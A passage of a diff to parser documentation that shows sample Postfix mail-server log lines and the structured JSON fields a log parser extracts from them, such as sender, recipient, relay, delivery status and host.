"127.0.0.1" ] } } 
@@ -3574,6 +3755,47 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "postfix8.json" + + ```json + + { + "message": "D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "smtp-in.example.com", + "ip": "5.6.7.8", + "port": 25 + }, + "log": { + "syslog": { + "appname": "postfix" + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp-in.example.com" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + === "postfix_cleanup1.json" ```json @@ -4572,6 +4794,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "network": { "protocol": "smtp" }, + "postfix": { + "headers": { + "from": [ + "EXAMPLE <[hola@example.org](mailto:hola@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, "related": { "hosts": [ "example.org" @@ -4588,21 +4818,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "sasl_login.json" +=== "replace_header_1.json" ```json { - "message": "warning: unknown[11.22.33.44]: SASL LOGIN authentication failed: authentication failure", + "message": "95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org)", "event": { "category": [ "email" ], - "reason": "SASL LOGIN authentication failed: authentication failure", "type": [ "info" ] }, + "email": { + "from": { + "address": [ + "test@example.org" + ] + } + }, "log": { "syslog": { "appname": "postfix/cleanup" 
@@ -4611,48 +4847,148 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "network": { "protocol": "smtp" }, + "postfix": { + "headers": { + "from": [ + "Example Mailbox <[test@example.org](mailto:test@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, "related": { - "ip": [ - "11.22.33.44" + "hosts": [ + "example.org" ] }, "source": { - "address": "11.22.33.44", - "ip": "11.22.33.44" + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" } } ``` -=== "smtp1.json" +=== "replace_header_2.json" ```json { - "message": "175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "message": "2F46A140256: replace: header From: \"Example Help\" , orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { "address": [ "jdoe@example.org" ] 
@@ -6507,6 +6843,6151 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "wo_appname_anvil.json" + + ```json + + { + "message": "statistics: max connection count 10 for (smtp:1.2.3.4) at Sep 11 10:47:30", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_appname_postfix_error.json" + + ```json + + { + "message": "2298F5F619: to=, relay=none, delay=89758, delays=89758/0.02/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.corp.com[1.1.1.1]:25: Connection timed out) 215", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "deferred", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "admin@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ] + } + } + + ``` + + +=== "wo_appname_appname_postfix_local.json" + + ```json + + { + "message": "11FDF5F62A: to=, relay=local, delay=80181, delays=80181/0.02/0/0, dsn=4.0.0, status=deferred (user lookup error)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "deferred", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "sub.corp.com", + "domain": "sub.corp.com", + "registered_domain": "corp.com", + "subdomain": "sub", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "USER@sub.corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "sub.corp.com" + ] + } + } + + ``` + + +=== 
"wo_appname_bounced.json" + + ```json + + { + "message": "3D770111AF50: to=, relay=none, delay=1.2, delays=1.1/0/0.03/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=corp.com type=AAAA: Host not found)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "bounced", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "username@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ] + } + } + + ``` + + +=== "wo_appname_cleanup.json" + + ```json + + { + "message": "77EFFC0015: warning: header Content-Disposition: inline; filename=\"image003.jpg\"; size=26055;??creation-date=\"Thu, 12 Sep 2019 12:39:01 GMT\";??modification-date=\"Thu, 12 Sep 2019 12:40:01 GMT\" from mail.outbound.protection.outlook.com[1.1.1.1]; from=<> to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "exemple.com", + "domain": "exemple.com", + "registered_domain": "exemple.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "john.doe@exemple.com" + ] + } + }, + "file": { + "created": "2019-09-12T12:39:01Z", + "ctime": "2019-09-12T12:40:01Z", + "name": "image003.jpg", + "size": 26055 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "exemple.com", + "mail.outbound.protection.outlook.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail.outbound.protection.outlook.com", + "domain": "mail.outbound.protection.outlook.com", + "ip": "1.1.1.1", + "registered_domain": "outlook.com", + "subdomain": "mail.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_cleanup2.json" + + ```json + 
+ { + "message": "3D770111AF50: warning: header Subject: Manquants LASTNAME GB Nouvelle version from unknown[10.1.1.1]; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "foo@corp.com" + ] + }, + "to": { + "address": [ + "first.last@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "SUBDOMAIN.CORP.COM", + "corp.com" + ], + "ip": [ + "10.1.1.1" + ] + }, + "source": { + "address": "SUBDOMAIN.CORP.COM", + "domain": "SUBDOMAIN.CORP.COM", + "ip": "10.1.1.1", + "registered_domain": "CORP.COM", + "subdomain": "SUBDOMAIN", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_cleanup3.json" + + ```json + + { + "message": "2CE6C111AF50: warning: header Subject: =?ISO-8859-1?Q?Pb_FTP_=3A_999_Aucune_action_effectu=E9e?= from unknown[10.1.1.1]; from= to= proto=ESMTP helo= 279", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "email@corp.com" + ] + }, + "to": { + "address": [ + "email@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "SUBDOMAIN.CORP.COM", + "corp.com" + ], + "ip": [ + "10.1.1.1" + ] + }, + "source": { + "address": "SUBDOMAIN.CORP.COM", + "domain": "SUBDOMAIN.CORP.COM", + "ip": "10.1.1.1", + "registered_domain": "CORP.COM", + "subdomain": "SUBDOMAIN", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_cleanup4.json" + + ```json + + { + "message": "B4B613F8B7: warning: header Content-Disposition: inline; filename=\"image001.png\"; size=8879;??creation-date=\"Thu, 14 Mar 2024 10:19:00 GMT\";??modification-date=\"Thu, 14 Mar 
2024 10:19:00 GMT\" from subdomain.key.corp.com[1.1.1.1]; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "office365.eu.vadesecure.com", + "domain": "office365.eu.vadesecure.com", + "registered_domain": "vadesecure.com", + "subdomain": "office365.eu", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "ndr.journaling@corp.com" + ] + }, + "to": { + "address": [ + "corp@office365.eu.vadesecure.com" + ] + } + }, + "file": { + "created": "2024-03-14T10:19:00Z", + "ctime": "2024-03-14T10:19:00Z", + "name": "image001.png", + "size": 8879 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "office365.eu.vadesecure.com", + "subdomain.key.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "subdomain.key.corp.com", + "domain": "subdomain.key.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "subdomain.key", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_cleanup5.json" + + ```json + + { + "message": "707A12000A: warning: header Content-Disposition: attachment;??filename=\"?iso-8859-2?q?representative_on_migration.pdf?=\"; size=259210;?? 
from local; from= to=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "lacomte.net", + "domain": "lacomte.net", + "registered_domain": "lacomte.net", + "top_level_domain": "net" + }, + "email": { + "from": { + "address": [ + "photo@mordor.com" + ] + }, + "to": { + "address": [ + "Pipin.touque@lacomte.net" + ] + } + }, + "file": { + "name": "?iso-8859-2?q?representative_on_migration.pdf?=", + "size": 259210 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "lacomte.net", + "mordor.com" + ] + }, + "source": { + "address": "mordor.com", + "domain": "mordor.com", + "registered_domain": "mordor.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_client.json" + + ```json + + { + "message": "486D13F8B7: client=COMPUTER.sub.corp.com[1.1.1.1]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "COMPUTER.sub.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "COMPUTER.sub.corp.com", + "domain": "COMPUTER.sub.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "COMPUTER.sub", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_client_address_field_with_mask.json" + + ```json + + { + "message": "8116C5F683: action=pass, reason=client whitelist, client_name=mail-corp123.outbound.protection.outlook.com, client_address=1.1.1.1/32, sender=firstname.lastname@corp.fr, recipient=firstname.lastname@corp2.fr", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client whitelist", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client whitelist", + "target": "network-traffic" + }, + "destination": { + "address": "corp2.fr", + "domain": "corp2.fr", + "registered_domain": "corp2.fr", + "top_level_domain": "fr" + }, + "email": { + "from": { + 
"address": [ + "firstname.lastname@corp.fr" + ] + }, + "to": { + "address": [ + "firstname.lastname@corp2.fr" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp2.fr", + "mail-corp123.outbound.protection.outlook.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail-corp123.outbound.protection.outlook.com", + "domain": "mail-corp123.outbound.protection.outlook.com", + "ip": "1.1.1.1", + "registered_domain": "outlook.com", + "subdomain": "mail-corp123.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_connect.json" + + ```json + + { + "message": "disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } + + ``` + + +=== "wo_appname_connection_limited.json" + + ```json + + { + "message": "53C2C140E40: host smtp.office365.com[1.1.1.1] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. 
[Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "1.1.1.1", + "domain": "smtp.office365.com", + "ip": "1.1.1.1" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "P212321.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "P212321.PROD.OUTLOOK.COM", + "domain": "P212321.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "P212321.PROD", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_connection_limited_1.json" + + ```json + + { + "message": "53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. 
[Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "52.97.201.210", + "domain": "smtp.office365.com", + "ip": "52.97.201.210" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1111111111111.US0394.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "52.97.201.210" + ] + }, + "source": { + "address": "1111111111111.US0394.PROD.OUTLOOK.COM", + "domain": "1111111111111.US0394.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "1111111111111.US0394.PROD", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_counter.json" + + ```json + + { + "message": "disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "localhost" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "localhost", + "domain": "localhost", + "ip": "127.0.0.1" + } + } + + ``` + + +=== "wo_appname_counter2.json" + + ```json + + { + "message": "disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7 93", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "localhost" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "localhost", + "domain": "localhost", + "ip": "127.0.0.1" + } + } + 
+ ``` + + +=== "wo_appname_counter3.json" + + ```json + + { + "message": "disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=2 data=1 quit=1 commands=6 137", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } + + ``` + + +=== "wo_appname_delivered_via_spamfilter.json" + + ```json + + { + "message": "EF0B15F675: to=, relay=spamfilter, delay=4.2, delays=1.6/0/0/2.6, dsn=2.0.0, status=sent (delivered via spamfilter service) 148", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "firstname.lastname@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ] + } + } + + ``` + + +=== "wo_appname_dns.json" + + ```json + + { + "message": "dns: new_dns_packet: domain is utf8 flagged: ns1.example.org", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "ns1.example.org", + "domain": "ns1.example.org", + "registered_domain": "example.org", + "subdomain": "ns1", + "top_level_domain": "org" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "ns1.example.org" + ] + } + } + + ``` + + +=== "wo_appname_local1.json" + + ```json + + { + "message": "175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" 
+ ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_local2.json" + + ```json + + { + "message": "1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "dmarc@example.org" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_local3.json" + + ```json + + { + "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== 
"wo_appname_local4.json" + + ```json + + { + "message": "B84078B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "foreman-proxy@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.com" + ] + } + } + + ``` + + +=== "wo_appname_local5.json" + + ```json + + { + "message": "B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.localdomain", + "domain": "example.localdomain", + "subdomain": "example" + }, + "email": { + "to": { + "address": [ + "proxy@example.localdomain" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "sample.orig.to" + }, + "related": { + "hosts": [ + "example.localdomain" + ] + } + } + + ``` + + +=== "wo_appname_local6.json" + + ```json + + { + "message": "04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + 
"domain": "example.org", + "ip": "127.0.0.1", + "port": 2525, + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "john.doe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "jane.doe@example.com" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_message_id.json" + + ```json + + { + "message": "476295F5AD: message-id=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "aaaaaaaaaa=@pm.me" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_message_id2.json" + + ```json + + { + "message": "123456789: message-id=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "foo@corp.com" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_noqueue.json" + + ```json + + { + "message": "NOQUEUE: filter: RCPT from foo.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 294", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "filter", + "outcome": "success", + "target": "network-traffic", + "type": "RCPT" + }, + "destination": { + "address": "othercorp.com", + "domain": "othercorp.com", + "registered_domain": "othercorp.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "foo.bar@subdomain.corp.com" + ] + }, + "to": { + "address": [ + "firstname.lastname@othercorp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "foo.key.corp.com", + "othercorp.com" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "foo.key.corp.com", + "domain": "foo.key.corp.com", + "ip": "192.168.1.1", + "registered_domain": "corp.com", + "subdomain": "foo.key", + 
"top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_noqueue2.json" + + ```json + + { + "message": "NOQUEUE: filter: RCPT from HOSTNAME.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 299", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "filter", + "outcome": "success", + "target": "network-traffic", + "type": "RCPT" + }, + "destination": { + "address": "corp2.com", + "domain": "corp2.com", + "registered_domain": "corp2.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "firstname.firstname@subdomain.corp.com" + ] + }, + "to": { + "address": [ + "firstname.lastname@corp2.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "HOSTNAME.key.corp.com", + "corp2.com" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "HOSTNAME.key.corp.com", + "domain": "HOSTNAME.key.corp.com", + "ip": "192.168.1.1", + "registered_domain": "corp.com", + "subdomain": "HOSTNAME.key", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_nospam.json" + + ```json + + { + "message": "Anonymous TLS connection established to example.org[1.2.3.4]:25: TLSv1.2 with cipher ADH-AES256-GCM-SHA384 (256/256 bits)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "1.2.3.4", + "domain": "example.org", + "ip": "1.2.3.4", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + } + } + + ``` + + +=== "wo_appname_pass.json" + + ```json + + { + "message": "action=pass, reason=triplet found, delay=2400, client_name=mordor.com, client_address=1.1.1.1, sender=mechant@mordor.com, recipient=Pipin.touque@lacomte.net", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "triplet found", + "type": [ + "info" + ] + }, + 
"action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "triplet found", + "target": "network-traffic" + }, + "destination": { + "address": "lacomte.net", + "domain": "lacomte.net", + "registered_domain": "lacomte.net", + "top_level_domain": "net" + }, + "email": { + "from": { + "address": [ + "mechant@mordor.com" + ] + }, + "to": { + "address": [ + "Pipin.touque@lacomte.net" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "lacomte.net", + "mordor.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mordor.com", + "domain": "mordor.com", + "ip": "1.1.1.1", + "registered_domain": "mordor.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_pass2.json" + + ```json + + { + "message": "action=pass, reason=client AAA, client_name=example.com, client_address=1.2.3.4, sender=Coyotte@acme.com, recipient=BIPBIP.NEWMAN@acme.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client AAA", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client AAA", + "target": "network-traffic" + }, + "destination": { + "address": "acme.com", + "domain": "acme.com", + "registered_domain": "acme.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "Coyotte@acme.com" + ] + }, + "to": { + "address": [ + "BIPBIP.NEWMAN@acme.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "acme.com", + "example.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.com", + "domain": "example.com", + "ip": "1.2.3.4", + "registered_domain": "example.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_pickup1.json" + + ```json + + { + "message": "E43D43F838: uid=117 from=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "no-reply@example.org" + ] + } + }, + 
"network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_pipe1.json" + + ```json + + { + "message": "175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_pipe2.json" + + ```json + + { + "message": "1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "dmarc@example.org" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_pipe3.json" + + ```json + + { + "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", + "event": { + "category": 
